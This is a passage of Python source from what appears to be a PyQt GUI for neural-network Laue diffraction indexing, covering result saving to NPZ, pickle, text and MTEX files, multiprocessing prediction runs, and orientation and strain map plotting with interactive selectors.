colx[i].append(np.zeros((lim_x*lim_y,3)))
coly[i].append(np.zeros((lim_x*lim_y,3)))
rotation_matrix[i].append(np.zeros((lim_x*lim_y,3,3)))
strain_matrix[i].append(np.zeros((lim_x*lim_y,3,3)))
strain_matrixs[i].append(np.zeros((lim_x*lim_y,3,3)))
match_rate[i].append(np.zeros((lim_x*lim_y,1)))
spots_len[i].append(np.zeros((lim_x*lim_y,1)))
iR_pix[i].append(np.zeros((lim_x*lim_y,1)))
fR_pix[i].append(np.zeros((lim_x*lim_y,1)))
mat_global[i].append(np.zeros((lim_x*lim_y,1)))
best_match[i].append([[] for jk in range(lim_x*lim_y)])
strain_matrix12, strain_matrixs12, \
rotation_matrix12, col12, \
colx12, coly12,\
match_rate12, mat_global12, cnt12,\
files_treated12, spots_len12, \
iR_pix12, fR_pix12, check12, \
best_match12, pred_hkl = predict_preprocessMP(filenameSingleExp, 0,
rotation_matrix,strain_matrix,strain_matrixs,
col,colx,coly,match_rate,spots_len,iR_pix,fR_pix,best_match,
mat_global,
check,self.detectorparameters,self.pixelsize,angbins,
classhkl, self.hkl_all_class0, self.hkl_all_class1, self.emin, self.emax,
self.material_, self.material1_, self.symmetry, self.symmetry1,lim_x,lim_y,
self.strain_calculation, ind_mat, ind_mat1,
model_direc, float(self.tolerance.text()), float(self.tolerance1.text()),
int(self.ubmat.text()), self.ccd_label.currentText(),
None,float(self.intensity_threshold.text()),
int(self.boxsize.text()),self.bkg_treatment.text(),
self.filenameDirec, self.experimental_prefix.text(),
blacklist, None,
[],False,
wb, temp_key, cor_file_directory, mode_analysis,
self.softmax_threshold_global,
self.mr_threshold_global,
self.cap_matchrate,
self.tolerance_strain,
self.tolerance_strain1,
self.NumberMaxofFits,
self.fit_peaks_gaussian_global,
self.FitPixelDev_global,
self.coeff,
self.coeff_overlap,
self.material0_limit,
self.material1_limit,
False,
self.material_phase_always_present,
self.crystal,
self.crystal1,
self.strain_free_parameters)
end_time = time.time() - start_time
print("Total time to process one file in "+mode_analysis+" mode (in seconds): "+str(end_time))
save_name = filenameSingleExp.split(".")[0].split("/")[-1]
np.savez_compressed(model_direc+'//'+save_name+"_"+mode_analysis+'.npz', strain_matrix12, strain_matrixs12, \
rotation_matrix12, col12, colx12, coly12, match_rate12, mat_global12, cnt12,\
files_treated12, spots_len12, iR_pix12, fR_pix12, check12, best_match12)
try:
path = os.path.normpath(filenameSingleExp)
files = cor_file_directory+"//"+path.split(os.sep)[-1].split(".")[0]+".cor"
allres = IOLT.readfile_cor(files, True)
data_theta, data_chi, peakx, peaky, intensity = allres[1:6]
CCDcalib = allres[-1]
detectorparameters = allres[-2]
# print('detectorparameters from file are: '+ str(detectorparameters))
pixelsize = CCDcalib['pixelsize']
CCDLabel = CCDcalib['CCDLabel']
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
dict_dp['peakX']=peakx
dict_dp['peakY']=peaky
dict_dp['intensity']=intensity
except:
try:
allres = IOLT.readfile_cor(filenameSingleExp, True)
data_theta, data_chi, peakx, peaky, intensity = allres[1:6]
CCDcalib = allres[-1]
detectorparameters = allres[-2]
# print('detectorparameters from file are: '+ str(detectorparameters))
pixelsize = CCDcalib['pixelsize']
CCDLabel = CCDcalib['CCDLabel']
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
dict_dp['peakX']=peakx
dict_dp['peakY']=peaky
dict_dp['intensity']=intensity
except:
print("No COR/ Exp. file could be found for the selected filename")
return
sim_twotheta1, sim_chi1, list_spots1, residues1, theo_index1 = [],[],[],[],[]
sim_energy1 = []
sim_hkl1 = []
for ijk in range(len(match_rate12)):
mat_global987 = mat_global12[ijk][0]
rotation_matrix987 = rotation_matrix12[ijk][0][0]
if mat_global987 == 1:
material_=self.material_
tolerance_add = float(self.tolerance.text())
elif mat_global987 == 2:
material_=self.material1_
tolerance_add = float(self.tolerance1.text())
else:
print("Matrix "+str(ijk+1)+" is not found")
material_ = None
tolerance_add = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
if np.all(rotation_matrix987==0):
material_ = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("No rotation matrix found")
if material_ != None:
sim_twotheta, sim_chi, sim_energy, sim_hkl,\
list_spots, residues, theo_index = simulate_spots(rotation_matrix987,
material_, self.emax, self.emin,
dict_dp['detectorparameters'], dict_dp,
tolerance_add, data_theta*2.0,
data_chi)
if len(sim_twotheta) == 0:
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("Nothing simulated")
sim_twotheta1.append(sim_twotheta)
sim_chi1.append(sim_chi)
list_spots1.append(list_spots)
residues1.append(residues)
theo_index1.append(theo_index)
sim_energy1.append(sim_energy)
sim_hkl1.append(sim_hkl)
w = MyPopup(match_rate12, rotation_matrix12, mat_global12, fR_pix12, \
filenameSingleExp, strain_matrix12, strain_matrixs12, end_time, mode_analysis,
data_theta, data_chi, intensity, sim_twotheta1, sim_chi1, sim_energy1, sim_hkl1,
list_spots1, residues1, theo_index1, pred_hkl)
# w.setGeometry(QRect(100, 100, 400, 200))
w.show()
self.popups.append(w)
#TODO cnt12 is 0 i.e. does not correspond to the image number
# cnt_mpdata = cnt12
# for i_mpdata in files_treated12:
# self.files_treated.append(i_mpdata)
# for intmat_mpdata in range(int(self.ubmat.text())):
# self.check[cnt_mpdata,intmat_mpdata] = check12[0,intmat_mpdata]
# self.mat_global[intmat_mpdata][0][cnt_mpdata] = mat_global12[intmat_mpdata][0][0]
# self.strain_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrix12[intmat_mpdata][0][0,:,:]
# self.strain_matrixs[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrixs12[intmat_mpdata][0][0,:,:]
# self.rotation_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = rotation_matrix12[intmat_mpdata][0][0,:,:]
# self.col[intmat_mpdata][0][cnt_mpdata,:] = col12[intmat_mpdata][0][0,:]
# self.colx[intmat_mpdata][0][cnt_mpdata,:] = colx12[intmat_mpdata][0][0,:]
# self.coly[intmat_mpdata][0][cnt_mpdata,:] = coly12[intmat_mpdata][0][0,:]
# self.match_rate[intmat_mpdata][0][cnt_mpdata] = match_rate12[intmat_mpdata][0][0]
# self.spots_len[intmat_mpdata][0][cnt_mpdata] = spots_len12[intmat_mpdata][0][0]
# self.iR_pix[intmat_mpdata][0][cnt_mpdata] = iR_pix12[intmat_mpdata][0][0]
# self.fR_pix[intmat_mpdata][0][cnt_mpdata] = fR_pix12[intmat_mpdata][0][0]
# self.best_match[intmat_mpdata][0][cnt_mpdata] = best_match12[intmat_mpdata][0][0]
# self.update_plot()
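    ## Save all prediction results: compressed NPZ + pickle of the result arrays, a per-pixel statistics text file, MTEX .ctf orientation files and summary plots.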
def save_btn(self,):
curr_time = time.time()
now = datetime.datetime.fromtimestamp(curr_time)
c_time = now.strftime("%Y-%m-%d_%H-%M-%S")
save_directory_ = self.model_direc+"//results_"+self.material_+"_"+c_time
if not os.path.exists(save_directory_):
os.makedirs(save_directory_)
np.savez_compressed(save_directory_+ "//results.npz",
self.best_match, self.mat_global, self.rotation_matrix, self.strain_matrix,
self.strain_matrixs,
self.col, self.colx, self.coly, self.match_rate, self.files_treated,
self.lim_x, self.lim_y, self.spots_len, self.iR_pix, self.fR_pix,
self.material_, self.material1_)
## intermediate saving of pickle objects with results
with open(save_directory_+ "//results.pickle", "wb") as output_file:
cPickle.dump([self.best_match, self.mat_global, self.rotation_matrix, self.strain_matrix,
self.strain_matrixs,
self.col, self.colx, self.coly, self.match_rate, self.files_treated,
self.lim_x, self.lim_y, self.spots_len, self.iR_pix, self.fR_pix,
self.material_, self.material1_, self.lattice_, self.lattice1_,
self.symmetry, self.symmetry1, self.crystal, self.crystal1], output_file)
try:
## Write global text file with all results
if self.material_ != self.material1_:
text_file = open(save_directory_+"//prediction_stats_"+self.material_+"_"+self.material1_+".txt", "w")
else:
text_file = open(save_directory_+"//prediction_stats_"+self.material_+".txt", "w")
filenames = list(np.unique(self.files_treated))
filenames.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
for i in range(self.lim_x*self.lim_y):
text_file.write("# ********** \n")
text_file.write("# Filename: "+ filenames[i] + "\n")
for j in range(len(self.best_match)):
stats_ = self.best_match[j][0][i]
dev_eps_sample = self.strain_matrixs[j][0][i,:,:]
dev_eps = self.strain_matrix[j][0][i,:,:]
initial_residue = self.iR_pix[j][0][i][0]
final_residue = self.fR_pix[j][0][i][0]
mat = int(self.mat_global[j][0][i][0])
if mat == 0:
case = "None"
elif mat == 1:
case = self.material_
elif mat == 2:
case = self.material1_
text_file.write("# ********** UB MATRIX "+str(j+1)+" \n")
text_file.write("Spot_index for 2 HKL are "+ str(stats_[0])+" ; "+ str(stats_[1])+ "\n")
text_file.write("HKL1 "+str(stats_[2])+"; HKL2 "+str(stats_[3])+"\n")
text_file.write("Coords of HKL1 "+str(stats_[4])+\
"; coords of HKL2 "+str(stats_[5])+"\n")
text_file.write("Distance between 2 spots is "+ str(stats_[6])+ "\n")
text_file.write("Distance between 2 spots in LUT is "+ str(stats_[7])+ "\n")
text_file.write("Accuracy of NN for 2 HKL is "+ str(stats_[8])+\
"% ; "+str(stats_[9])+ "% \n")
string1 = "Matched, Expected, Matching rate(%) : " + \
str(stats_[10]) +", "+str(stats_[11]) +", "+str(stats_[12])+" \n"
text_file.write(string1)
text_file.write("Rotation matrix for 2 HKL (multiplied by symmetry) is \n")
temp_ = stats_[14].flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
text_file.write(string1)
text_file.write("dev_eps_sample is \n")
temp_ = dev_eps_sample.flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
text_file.write(string1)
text_file.write("dev_eps is \n")
temp_ = dev_eps.flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
text_file.write(string1)
text_file.write("Initial_pixel, Final_pixel residues are : "+str(initial_residue)+", "+str(final_residue)+" \n")
text_file.write("Mat_id is "+str(mat)+"\n")
text_file.write("Material indexed is "+case+"\n")
text_file.write("\n")
text_file.close()
print("prediction statistics are generated")
except:
# text_file.close()
print("Errors with writing prediction output text file; could be the prediction was stopped midway")
try:
## write MTEX file
rotation_matrix = [[] for i in range(len(self.rotation_matrix))]
for i in range(len(self.rotation_matrix)):
rotation_matrix[i].append(np.zeros((self.lim_x*self.lim_y,3,3)))
for i in range(len(self.rotation_matrix)):
temp_mat = self.rotation_matrix[i][0]
for j in range(len(temp_mat)):
orientation_matrix = temp_mat[j,:,:]
                    ## rotate the orientation by 40 degrees to bring it into the sample reference frame
omega = np.deg2rad(-40)
                    # rotation by -omega about the X (or Y?) axis to go back to the sample frame Rsample
cw = np.cos(omega)
sw = np.sin(omega)
mat_from_lab_to_sample_frame = np.array([[cw, 0.0, sw], [0.0, 1.0, 0.0], [-sw, 0, cw]]) #Y
# mat_from_lab_to_sample_frame = np.array([[1.0, 0.0, 0.0], [0.0, cw, -sw], [0.0, sw, cw]]) #X
# mat_from_lab_to_sample_frame = np.array([[cw, -sw, 0.0], [sw, cw, 0.0], [0.0, 0.0, 1.0]]) #Z
orientation_matrix = np.dot(mat_from_lab_to_sample_frame.T, orientation_matrix)
if np.linalg.det(orientation_matrix) < 0:
orientation_matrix = -orientation_matrix
rotation_matrix[i][0][j,:,:] = orientation_matrix
if self.material_ == self.material1_:
lattice = self.lattice_
material0_LG = material0_lauegroup
header = [
"Channel Text File",
"Prj lauetoolsnn",
"Author [Ravi raj purohit]",
"JobMode Grid",
"XCells "+str(self.lim_x),
"YCells "+str(self.lim_y),
"XStep 1.0",
"YStep 1.0",
"AcqE1 0",
"AcqE2 0",
"AcqE3 0",
"Euler angles refer to Sample Coordinate system (CS0)! Mag 100 Coverage 100 Device 0 KV 15 TiltAngle 40 TiltAxis 0",
"Phases 1",
str(round(lattice._lengths[0]*10,5))+";"+str(round(lattice._lengths[1]*10,5))+";"+\
str(round(lattice._lengths[2]*10,5))+"\t"+str(round(lattice._angles[0],5))+";"+\
str(round(lattice._angles[1],5))+";"+str(round(lattice._angles[2],5))+"\t"+"Material1"+ "\t"+material0_LG+ "\t"+"????"+"\t"+"????",
"Phase X Y Bands Error Euler1 Euler2 Euler3 MAD BC BS"]
else:
lattice = self.lattice_
lattice1 = self.lattice1_
material0_LG = material0_lauegroup
material1_LG = material1_lauegroup
header = [
"Channel Text File",
"Prj lauetoolsnn",
"Author [Ravi raj purohit]",
"JobMode Grid",
"XCells "+str(self.lim_x),
"YCells "+str(self.lim_y),
"XStep 1.0",
"YStep 1.0",
"AcqE1 0",
"AcqE2 0",
"AcqE3 0",
"Euler angles refer to Sample Coordinate system (CS0)! Mag 100 Coverage 100 Device 0 KV 15 TiltAngle 40 TiltAxis 0",
"Phases 2",
str(round(lattice._lengths[0]*10,5))+";"+str(round(lattice._lengths[1]*10,5))+";"+\
str(round(lattice._lengths[2]*10,5))+"\t"+str(round(lattice._angles[0],5))+";"+\
str(round(lattice._angles[1],5))+";"+str(round(lattice._angles[2],5))+"\t"+"Material1"+ "\t"+material0_LG+ "\t"+"????"+"\t"+"????",
str(round(lattice1._lengths[0]*10,5))+";"+str(round(lattice1._lengths[1]*10,5))+";"+\
str(round(lattice1._lengths[2]*10,5))+"\t"+str(round(lattice1._angles[0],5))+";"+\
str(round(lattice1._angles[1],5))+";"+str(round(lattice1._angles[2],5))+"\t"+"Material2"+ "\t"+material1_LG+ "\t"+"????"+"\t"+"????",
"Phase X Y Bands Error Euler1 Euler2 Euler3 MAD BC BS"]
# =================CALCULATION OF POSITION=====================================
for index in range(len(self.rotation_matrix)):
euler_angles = np.zeros((len(rotation_matrix[index][0]),3))
phase_euler_angles = np.zeros(len(rotation_matrix[index][0]))
for i in range(len(rotation_matrix[index][0])):
if np.all(rotation_matrix[index][0][i,:,:] == 0):
continue
euler_angles[i,:] = OrientationMatrix2Euler(rotation_matrix[index][0][i,:,:])
phase_euler_angles[i] = self.mat_global[index][0][i]
euler_angles = euler_angles.reshape((self.lim_x,self.lim_y,3))
phase_euler_angles = phase_euler_angles.reshape((self.lim_x,self.lim_y,1))
a = euler_angles
if self.material_ != self.material1_:
filename125 = save_directory_+ "//"+self.material_+"_"+self.material1_+"_MTEX_UBmat_"+str(index)+"_LT.ctf"
else:
filename125 = save_directory_+ "//"+self.material_+"_MTEX_UBmat_"+str(index)+"_LT.ctf"
f = open(filename125, "w")
for ij in range(len(header)):
f.write(header[ij]+" \n")
for i123 in range(euler_angles.shape[1]):
y_step = 1 * i123
for j123 in range(euler_angles.shape[0]):
x_step = 1 * j123
phase_id = int(phase_euler_angles[j123,i123,0])
eul = str(phase_id)+'\t' + "%0.4f" % x_step +'\t'+"%0.4f" % y_step+'\t8\t0\t'+ \
"%0.4f" % a[j123,i123,0]+'\t'+"%0.4f" % a[j123,i123,1]+ \
'\t'+"%0.4f" % a[j123,i123,2]+'\t0.0001\t180\t0\n'
string = eul
f.write(string)
f.close()
except:
print("Error writing the MTEX file, could be the prediction data is not completed and save function was called")
#% Plot some data
try:
global_plots(self.lim_x, self.lim_y, self.rotation_matrix, self.strain_matrix, self.strain_matrixs,
self.col, self.colx, self.coly, self.match_rate, self.mat_global, self.spots_len,
self.iR_pix, self.fR_pix, save_directory_, self.material_, self.material1_,
match_rate_threshold=5, bins=30)
except:
print("Error in the global plots module")
# try:
# save_sst(self.lim_x, self.lim_y, self.strain_matrix, self.strain_matrixs, self.col,
# self.colx, self.coly, self.match_rate, self.mat_global, self.spots_len,
# self.iR_pix, self.fR_pix, save_directory_, self.material_, self.material1_,
# self.lattice_, self.lattice1_, self.symmetry, self.symmetry1, self.crystal, self.crystal1,
# self.rotation_matrix, self.symmetry_name, self.symmetry1_name,
# mac_axis = [0., 0., 1.], axis_text="Z", match_rate_threshold=5)
# except:
# print("Error in the SST plots module")
## HKL selective plots (in development)
hkls_list = ast.literal_eval(self.hkl_plot.text())
if self.ipf_axis.currentText() == "Z":
mac_axis = [0., 0., 1.]
elif self.ipf_axis.currentText() == "Y":
mac_axis = [0., 1., 0.]
elif self.ipf_axis.currentText() == "X":
mac_axis = [1., 0., 0.]
print(mac_axis, hkls_list)
# save_hkl_stats(self.lim_x, self.lim_y, self.strain_matrix, self.strain_matrixs, self.col,
# self.colx, self.coly, self.match_rate, self.mat_global, self.spots_len,
# self.iR_pix, self.fR_pix, save_directory_, self.material_, self.material1_,
# self.lattice_, self.lattice1_, self.symmetry, self.symmetry1, self.rotation_matrix,
# hkls_list=hkls_list, angle=10., mac_axis = mac_axis, axis_text = self.ipf_axis.currentText())
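    ## Launch the prediction run: reload the model JSON and weights, start the worker processes and update timer in MultiProcessing mode, then run plot_pcv1 in a background thread.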
def plot_pc(self):
## update matrix plot box?
if self.matrix_plot.count() < int(self.ubmat.text()):
for intmat in range(int(self.ubmat.text())):
if intmat == 0 or intmat < self.matrix_plot.count():
continue
self.matrix_plot.addItem(str(intmat+1))
self.modify_array()
self.btn_config.setEnabled(False)
self.model_direc = self.modelDirec
## load model related files and generate the model
if self.material_ != self.material1_:
json_file = open(self.model_direc+"//model_"+self.material_+"_"+self.material1_+".json", 'r')
else:
json_file = open(self.model_direc+"//model_"+self.material_+".json", 'r')
self.classhkl = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
self.angbins = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
if self.material_ != self.material1_:
self.ind_mat = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_5"]
self.ind_mat1 = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_6"]
else:
self.ind_mat = None
self.ind_mat1 = None
load_weights = self.filenameModel[0]
self.wb = read_hdf5(load_weights)
self.temp_key = list(self.wb.keys())
# # load json and create model
loaded_model_json = json_file.read()
json_file.close()
self.model = model_from_json(loaded_model_json)
load_weights = self.filenameModel[0]
self.model.load_weights(load_weights)
if self.file_state==0:
ct = time.time()
now = datetime.datetime.fromtimestamp(ct)
self.c_time = now.strftime("%Y-%m-%d_%H-%M-%S")
self.file_state = 1
self.initialize_plot()
self.mode_spotCycle = self.analysis_plot_tech.currentText()
if self.matrix_plot_tech.currentText() == "MultiProcessing":
self.ncpu = cpu_count_user
self._inputs_queue = Queue()
self._outputs_queue = Queue()
run_flag = multip.Value('I', True)
self._worker_processes = {}
for i in range(self.ncpu):
self._worker_processes[i]= Process(target=worker, args=(self._inputs_queue, self._outputs_queue, i+1, run_flag))#, mp_rotation_matrix))
for i in range(self.ncpu):
self._worker_processes[i].start()
### Update data from multiprocessing
            self.timermp1212.setInterval(500) ## check every 500 ms (update the list of files in the folder)
self.timermp1212.timeout.connect(self.update_data_mp1212)
self.timermp1212.start()
self.out_name = None
self.run = True
self.temp_ = threading.Thread(target=self.plot_pcv1, daemon=False)
self.temp_.start()
self.btn_stop.setEnabled(True)
self.btn_save.setEnabled(False)
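    ## Refresh the IPF, matching-rate, material-index and deviatoric-strain maps for the UB matrix currently selected in the combo box.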
def update_plot(self):
index_plotfnc = int(self.matrix_plot.currentText())-1
if self.ipf_axis.currentText() == "Z":
col_plot_plotfnc = self.col[index_plotfnc][0]
elif self.ipf_axis.currentText() == "Y":
col_plot_plotfnc = self.coly[index_plotfnc][0]
elif self.ipf_axis.currentText() == "X":
col_plot_plotfnc = self.colx[index_plotfnc][0]
col_plot_plotfnc = col_plot_plotfnc.reshape((self.lim_x, self.lim_y, 3))
mr_plot_plotfnc = self.match_rate[index_plotfnc][0]
mr_plot_plotfnc = mr_plot_plotfnc.reshape((self.lim_x, self.lim_y))
mat_glob_plotfnc = self.mat_global[index_plotfnc][0]
mat_glob_plotfnc = mat_glob_plotfnc.reshape((self.lim_x, self.lim_y))
self.im_axes.set_data(col_plot_plotfnc)
self.im_axes1.set_data(mr_plot_plotfnc)
if self.im_axes3 != None:
self.im_axes3.set_data(mat_glob_plotfnc)
strain_index_plotfnc = self.strain_plot.currentText()
if "sample" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = self.strain_matrixs[index_plotfnc][0]
elif "crystal" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = self.strain_matrix[index_plotfnc][0]
if "11" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,0]
elif "22" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,1,1]
elif "33" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,2,2]
elif "12" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,1]
elif "13" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,2]
elif "23" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,1,2]
strain_tensor_plot_plotfnc = strain_matrix_plot_plotfnc.reshape((self.lim_x, self.lim_y))
self.im_axes2.set_data(strain_tensor_plot_plotfnc)
self.canvas.draw()
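    ## Build the image panels (IPF map, matching rate, deviatoric strain and, for two materials, material index) and attach the rectangle/line selectors.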
def initialize_plot(self):
## get color matrix to plot
index_plotfnc = int(self.matrix_plot.currentText())-1
strain_index_plotfnc = self.strain_plot.currentText()
if "sample" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = self.strain_matrixs[index_plotfnc][0]
elif "crystal" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = self.strain_matrix[index_plotfnc][0]
if "11" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,0]
elif "22" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,1,1]
elif "33" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,2,2]
elif "12" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,1]
elif "13" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,2]
elif "23" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,1,2]
try:
strain_tensor_plot_plotfnc = strain_matrix_plot_plotfnc.reshape((self.lim_x, self.lim_y))
except:
print("Reshape error, verify the grid xlim and ylim and change them")
return
if self.ipf_axis.currentText() == "Z":
col_plot_plotfnc = self.col[index_plotfnc][0]
elif self.ipf_axis.currentText() == "Y":
col_plot_plotfnc = self.coly[index_plotfnc][0]
elif self.ipf_axis.currentText() == "X":
col_plot_plotfnc = self.colx[index_plotfnc][0]
col_plot_plotfnc = col_plot_plotfnc.reshape((self.lim_x, self.lim_y, 3))
mr_plot_plotfnc = self.match_rate[index_plotfnc][0]
mr_plot_plotfnc = mr_plot_plotfnc.reshape((self.lim_x, self.lim_y))
mat_glob_plotfnc = self.mat_global[index_plotfnc][0]
mat_glob_plotfnc = mat_glob_plotfnc.reshape((self.lim_x, self.lim_y))
# Drop off the first y element, append a new one.
self.canvas.axes.cla()
self.canvas.axes.set_title("IPF map (rectangle selector)", loc='center', fontsize=10)
self.im_axes = self.canvas.axes.imshow(col_plot_plotfnc, origin='lower')
self.canvas.axes1.cla()
self.canvas.axes1.set_title("Matching rate (line selector)", loc='center', fontsize=10)
self.im_axes1 = self.canvas.axes1.imshow(mr_plot_plotfnc, origin='lower', cmap="jet", vmin=0, vmax=100)
self.canvas.axes2.cla()
self.canvas.axes2.set_title("Deviatoric strain", loc='center', fontsize=10)
self.im_axes2 = self.canvas.axes2.imshow(strain_tensor_plot_plotfnc, origin='lower', cmap="jet", vmin=-1, vmax=1)
if self.material_ != self.material1_:
self.canvas.axes3.cla()
self.canvas.axes3.set_title("Material Index (1: "+self.material_+"; 2: "+self.material1_+")", loc='center', fontsize=10)
self.im_axes3 = self.canvas.axes3.imshow(mat_glob_plotfnc, origin='lower', vmin=0, vmax=2)
else:
self.im_axes3 = None
toggle_selector.RS = RectangleSelector(self.canvas.axes, self.box_select_callback,
drawtype='box', useblit=True,
button=[1], # don't use middle/right button
minspanx=5, minspany=5,
spancoords='pixels',
interactive=True)
toggle_selector1.RS = RectangleSelector(self.canvas.axes1, self.line_select_callback,
drawtype='line', useblit=True,
button=[1], # don't use middle/right button
minspanx=5, minspany=5,
spancoords='pixels',
interactive=True)
# Trigger the canvas to update and redraw.
self.canvas.draw()
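    ## Line selector callback: sample the deviatoric strain tensor along the drawn line and show it in a popup window.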
def line_select_callback(self, eclick, erelease):
'eclick and erelease are the press and release events'
if eclick.button == 1 and erelease.button == 1:
x1, y1 = int(np.round(eclick.xdata)), int(np.round(eclick.ydata))
x2, y2 = int(np.round(erelease.xdata)), int(np.round(erelease.ydata))
print("(%3.2f, %3.2f) --> (%3.2f, %3.2f)" % (x1, y1, x2, y2))
# print(" The button you used were: %s %s" % (eclick.button, erelease.button))
try:
index_plotfnc = int(self.matrix_plot.currentText())-1
title_plotfnc = "Deviatoric strain (crystal frame)"
strain_matrix_plot_plotfnc = self.strain_matrix[index_plotfnc][0]
try:
strain_tensor_plot_plotfnc = strain_matrix_plot_plotfnc.reshape((self.lim_x, self.lim_y,3,3))
num = int(np.hypot(x2-x1, y2-y1)) #np.max((abs(x2-x1),abs(y2-y1)))
x, y = np.linspace(x1, x2, num), np.linspace(y1, y2, num)
# Extract the values along the line
strain_tensor_cropped = strain_tensor_plot_plotfnc[y.astype(int), x.astype(int),:,:]
except:
print("Reshape error, verify the grid xlim and ylim and change them")
return
except:
print("No stats could be generated for the selected range of pixels")
return
w = MyPopup_image_v2(strain_tensor_cropped, title_plotfnc, flag=1)
w.show()
self.popups.append(w)
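    ## Rectangle selector callback: crop the deviatoric strain tensor to the selected box and show it in a popup window.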
def box_select_callback(self, eclick, erelease):
'eclick and erelease are the press and release events'
if eclick.button == 1 and erelease.button == 1:
x1, y1 = int(np.round(eclick.xdata)), int(np.round(eclick.ydata))
x2, y2 = int(np.round(erelease.xdata)), int(np.round(erelease.ydata))
print("(%3.2f, %3.2f) --> (%3.2f, %3.2f)" % (x1, y1, x2, y2))
# print(" The button you used were: %s %s" % (eclick.button, erelease.button))
try:
index_plotfnc = int(self.matrix_plot.currentText())-1
title_plotfnc = "Deviatoric strain (crystal frame)"
strain_matrix_plot_plotfnc = self.strain_matrix[index_plotfnc][0]
try:
strain_tensor_plot_plotfnc = strain_matrix_plot_plotfnc.reshape((self.lim_x, self.lim_y,3,3))
except:
print("Reshape error, verify the grid xlim and ylim and change them")
return
except:
print("No stats could be generated for the selected range of pixels")
return
## crop the strain array with the coordinates of the rectangle
strain_tensor_cropped = strain_tensor_plot_plotfnc[y1:y2,x1:x2,:,:]
w = MyPopup_image_v2(strain_tensor_cropped, title_plotfnc)
w.show()
self.popups.append(w)
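    ## Mouse handler on the maps: double/middle click opens the raw detector image of the clicked pixel; right click re-simulates and overlays the indexation result for that pixel.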
def onclickImage(self, event123):
if event123.dblclick or event123.button == 2:
ix, iy = event123.xdata, event123.ydata
try:
                ## read the saved COR file and extract experimental spot info; avoid the zero-index problem
ix = int(round(ix))
iy = int(round(iy))
try:
if iy == 0 and ix == 0:
image_no = 0
elif iy == 0 and ix != 0:
image_no = ix
elif iy != 0 and ix == 0:
image_no = iy * self.lim_y
elif iy != 0 and ix != 0:
image_no = iy * self.lim_y + ix
ccd_label = self.ccd_label.currentText()
path = os.path.normpath(self.filenm[image_no].decode())
Data, framedim, fliprot = IOimage.readCCDimage(path,
stackimageindex=-1,
CCDLabel=ccd_label,
dirname=None,
verbose=0)
except:
print(path)
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
print("No IMAGE file could be found for the selected pixel")
return
w = MyPopup_image_v1(ix, iy, path, Data, ccd_label,
self.predict_single_file_nodialog, image_no,
self.detectorparameters)
w.show()
self.popups.append(w)
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
except:
return
elif event123.button == 3:
ix, iy = event123.xdata, event123.ydata
try:
                ## read the saved COR file and extract experimental spot info; avoid the zero-index problem
ix = int(round(ix))
iy = int(round(iy))
try:
if iy == 0 and ix == 0:
image_no = 0
elif iy == 0 and ix != 0:
image_no = ix
elif iy != 0 and ix == 0:
image_no = iy * self.lim_y
elif iy != 0 and ix != 0:
image_no = iy * self.lim_y + ix
# image_no = int(ix*iy+(iy-1)-1)
index_plotfnc = int(self.matrix_plot.currentText())-1
